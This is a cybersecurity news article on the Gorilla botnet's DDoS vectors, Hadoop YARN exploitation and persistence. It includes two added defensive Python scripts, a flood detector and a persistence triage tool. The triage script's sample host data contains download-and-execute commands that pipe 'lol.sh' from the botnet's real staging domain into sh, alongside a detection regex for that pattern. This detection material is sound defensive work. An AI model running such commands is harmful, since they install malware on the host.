Gorilla Botnet Unleashes 300,000+ DDoS Attacks in Over 100 Countries
Cybersecurity experts have uncovered a new botnet malware family dubbed Gorilla (also known as GorillaBot), which is based on the leaked source code of the infamous Mirai botnet. According to cybersecurity firm NSFOCUS, the Gorilla botnet initiated a staggering 300,000+ attack commands between September 4 and September 27, 2024, showcasing an unprecedented level of attack density.
On average, the botnet has been generating over 20,000 distributed denial-of-service (DDoS) attack commands per day, targeting a wide array of sectors including universities, government websites, telecom companies, banks, gaming, and gambling platforms. The most affected countries include China, the United States, Canada, and Germany, but the attacks have spanned across more than 100 nations.
The botnet uses a range of DDoS techniques, including UDP flood, SYN flood, ACK flood, ACK BYPASS flood, and Valve Source Engine (VSE) flood. Because UDP is connectionless and needs no handshake, the UDP-based vectors can be sent with arbitrary spoofed source IP addresses, which lets the botnet generate overwhelming traffic while hiding the infected hosts behind forged addresses.
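The vectors above are easy to tell apart on the wire once packets are bucketed per target and per second. The following is an added example written for this page, not code from NSFOCUS or from the Gorilla samples: it classifies constructed packet summaries into the flood types the article names and raises an alert when one target receives a burst of a single vector from many distinct sources (the tell-tale of a spoofed flood). The thresholds and the sample traffic are assumptions chosen for illustration; the VSE signature is the standard Source Engine A2S_INFO query.

```python
"""Classify and detect the DDoS vectors attributed to Gorilla.

Added example (not NSFOCUS's or the malware's code). Operates on
packet summaries (plain dicts) instead of a live capture; thresholds
and sample packets below are assumptions for illustration.
"""
from collections import defaultdict

# A2S_INFO request that Valve Source Engine game servers answer; a "VSE
# flood" hammers or reflects this query. This byte string is the
# documented query format, not something taken from the malware.
VSE_QUERY = b"\xff\xff\xff\xffTSource Engine Query\x00"

TCP_SYN, TCP_ACK = 0x02, 0x10


def classify_packet(pkt):
    """Map one packet summary to the flood vector it would belong to."""
    if pkt["proto"] == "udp":
        if pkt.get("payload", b"").startswith(VSE_QUERY):
            return "vse_flood"
        return "udp_flood"
    if pkt["proto"] == "tcp":
        flags = pkt["flags"]
        if flags & TCP_SYN and not flags & TCP_ACK:
            return "syn_flood"
        if flags & TCP_ACK and not flags & TCP_SYN:
            # ACK flood and "ACK BYPASS" flood look alike per packet; the
            # distinguishing check is whether the segment belongs to an
            # established connection, which needs state this example skips.
            return "ack_flood"
    return "other"


def detect_floods(packets, window_s=1.0, threshold=100, min_sources=10):
    """Return {(dst, vector): (packets, distinct_sources)} for every target
    that receives at least `threshold` packets of one vector inside a
    `window_s` bucket from at least `min_sources` distinct source IPs.
    Spoofed floods show up as many sources, because each packet can
    carry a forged address and the sender never needs a reply.
    """
    counts = defaultdict(int)
    sources = defaultdict(set)
    for pkt in packets:
        vec = classify_packet(pkt)
        if vec == "other":
            continue
        key = (pkt["dst"], vec, int(pkt["ts"] // window_s))
        counts[key] += 1
        sources[key].add(pkt["src"])

    alerts = {}
    for (dst, vec, win), n in counts.items():
        n_src = len(sources[(dst, vec, win)])
        if n >= threshold and n_src >= min_sources:
            # keep the worst window per (target, vector)
            alerts[(dst, vec)] = max(alerts.get((dst, vec), (0, 0)), (n, n_src))
    return alerts


def make_sample_traffic():
    """Constructed sample traffic (not a real capture). Addresses are
    from the RFC 5737 documentation ranges."""
    target = "203.0.113.10"
    pkts = []
    # 300 UDP packets in one second from 300 spoofed sources: UDP flood
    for i in range(300):
        pkts.append({"ts": i / 300, "proto": "udp", "dst": target,
                     "src": f"198.51.{i // 250}.{i % 250 + 1}",
                     "payload": b"\x00" * 64})
    # 150 bare SYNs from 20 sources: SYN flood
    for i in range(150):
        pkts.append({"ts": i / 150, "proto": "tcp", "dst": target,
                     "src": f"192.0.2.{i % 20 + 1}", "flags": TCP_SYN})
    # 50 VSE queries: classified correctly but below the alert threshold
    for i in range(50):
        pkts.append({"ts": i / 50, "proto": "udp", "dst": target,
                     "src": f"192.0.2.{100 + i}", "payload": VSE_QUERY})
    # a handful of ordinary ACKs from one client: noise, never alerted
    for i in range(5):
        pkts.append({"ts": i / 5, "proto": "tcp", "dst": target,
                     "src": "192.0.2.200", "flags": TCP_ACK})
    return pkts


if __name__ == "__main__":
    for (dst, vec), (n, n_src) in sorted(detect_floods(make_sample_traffic()).items()):
        print(f"{dst}: {vec} {n} pkts/s from {n_src} sources")
```

On the constructed traffic the UDP and SYN bursts are reported while the 50 VSE queries stay below the threshold; in production the per-second threshold and the source-count floor would be tuned to the link's baseline, and the ACK vectors would be checked against the connection table rather than counted blindly.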
Gorilla’s versatility extends to its support for multiple CPU architectures, including ARM, MIPS, x86_64, and x86, enabling it to infect a variety of devices. It connects to one of five predefined command-and-control (C2) servers, which issue DDoS commands.
The malware also exploits a known Apache Hadoop YARN RPC vulnerability to achieve remote code execution on exposed clusters. The flaw has been abused in the wild since at least 2021, according to Alibaba Cloud and Trend Micro, which underscores that Gorilla targets cloud servers as well as IoT devices.
The botnet also employs persistence mechanisms to maintain control over infected hosts. It creates a service file named "custom.service" in the "/etc/systemd/system/" directory, ensuring automatic execution at system startup. Additionally, commands are embedded into files such as "/etc/inittab," "/etc/profile," and "/boot/bootcmd" to download and execute a malicious script ("lol.sh") from a remote server ("pen.gorillafirewall[.]su").
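The persistence locations named above are a natural triage checklist for incident responders. The script below is an added example, not NSFOCUS's or the malware's code: it looks for the systemd unit at the path the article gives, then scans the listed startup files for the article's indicators (the staging domain, the script name) and for a generic download-and-execute chain. The sample file contents are constructed to show what a hit looks like; the URL path in them is invented for the sample, and the indicator list contains only what the article states, so a real deployment would feed it a fuller IOC set.

```python
"""Triage the persistence locations attributed to Gorilla.

Added example (not NSFOCUS's or the malware's code). Indicators are
limited to those named in the article; SAMPLE_FS is constructed for
demonstration. `scan_persistence()` with no argument reads the live
filesystem, so run it as root on the suspect host.
"""
import re
from pathlib import Path

# Indicators from the article. The domain is kept defanged in the
# constant (as the article prints it) and restored only for matching.
IOC_DOMAIN_DEFANGED = "pen.gorillafirewall[.]su"
IOC_DOMAIN = IOC_DOMAIN_DEFANGED.replace("[.]", ".")
IOC_SCRIPT = "lol.sh"
UNIT_PATH = "/etc/systemd/system/custom.service"
STARTUP_FILES = ["/etc/inittab", "/etc/profile", "/boot/bootcmd"]

# wget/curl followed by a pipe or chain into a shell on the same line:
# the generic shape of a "download and execute" dropper command.
DOWNLOAD_EXEC = re.compile(r"\b(wget|curl)\b[^\n]*?(\||;|&&)[^\n]*\b(sh|bash)\b")


def check_content(path, text):
    """Return (path, reason) findings for one file's text."""
    findings = []
    if IOC_DOMAIN in text:
        findings.append((path, "ioc_domain"))
    if IOC_SCRIPT in text:
        findings.append((path, "ioc_script"))
    if DOWNLOAD_EXEC.search(text):
        findings.append((path, "download_exec"))
    return findings


def scan_persistence(read=None):
    """Scan the unit file and startup files; `read(path)` returns the
    file's text or None if absent. Defaults to the live filesystem."""
    if read is None:
        def read(p):
            try:
                return Path(p).read_text(errors="replace")
            except OSError:
                return None

    findings = []
    unit = read(UNIT_PATH)
    if unit is not None:
        # The unit name alone is a hit: it is not shipped by any distro.
        findings.append((UNIT_PATH, "unit_present"))
        findings.extend(check_content(UNIT_PATH, unit))
    for p in STARTUP_FILES:
        text = read(p)
        if text is not None:
            findings.extend(check_content(p, text))
    return findings


# Constructed sample host image (not real evidence): an infected unit,
# a tampered inittab, a clean profile, and no /boot/bootcmd at all.
SAMPLE_FS = {
    UNIT_PATH: (
        "[Unit]\nDescription=custom\n\n[Service]\n"
        "ExecStart=/bin/sh -c 'wget -qO- http://pen.gorillafirewall.su/lol.sh | sh'\n"
        "Restart=always\n\n[Install]\nWantedBy=multi-user.target\n"
    ),
    "/etc/inittab": (
        "::sysinit:/etc/init.d/rcS\n"
        "::once:/bin/sh -c 'curl -s http://pen.gorillafirewall.su/lol.sh | sh'\n"
    ),
    "/etc/profile": "# /etc/profile\nexport PATH=/usr/local/bin:$PATH\n",
}


if __name__ == "__main__":
    for path, reason in scan_persistence(lambda p: SAMPLE_FS.get(p)):
        print(f"{path}: {reason}")
```

Swap the lambda for `scan_persistence()` to read the real `/etc` and `/boot`; the `download_exec` rule is deliberately generic so it will also catch a re-staged copy that uses a different domain or script name, at the cost of needing a human to confirm each hit.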
What sets Gorilla apart is its use of encryption algorithms, commonly seen in attacks by the Keksec group, to obscure critical information and evade detection. According to NSFOCUS, this emerging botnet demonstrates an advanced level of counter-detection techniques and is adept at maintaining long-term control over IoT devices and cloud servers.
Key takeaways:
- Over 300,000 DDoS attack commands issued in under a month against targets in 100+ countries.
- Targets range from universities to government and financial institutions.
- Exploits a vulnerability in Apache Hadoop YARN RPC for remote code execution.
- Uses multiple DDoS attack methods and sophisticated encryption to evade detection.
This makes GorillaBot a rising cybersecurity threat that organizations worldwide must guard against.